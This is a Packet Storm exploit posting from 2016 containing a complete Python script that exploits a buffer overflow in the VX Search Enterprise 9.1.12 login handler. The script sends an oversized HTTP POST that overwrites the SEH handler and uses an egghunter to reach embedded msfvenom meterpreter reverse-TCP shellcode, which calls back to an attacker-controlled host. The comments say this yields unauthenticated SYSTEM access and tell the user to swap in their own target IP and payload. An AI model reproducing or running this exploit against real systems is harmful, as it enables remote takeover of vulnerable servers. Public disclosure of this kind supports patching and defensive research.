what you don't know can hurt you

VX Search Enterprise 9.1.12 Buffer Overflow

VX Search Enterprise 9.1.12 Buffer Overflow
Posted Nov 28, 2016
Authored by Tulpa

VX Search Enterprise version 9.1.12 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | 3ea51412ddc3f221b25e6182852d5a69

VX Search Enterprise 9.1.12 Buffer Overflow

Change Mirror Download
#!/usr/bin/python

print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10015BBE

nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    32 Files
  • 20
    Feb 20th
    15 Files
  • 21
    Feb 21st
    17 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close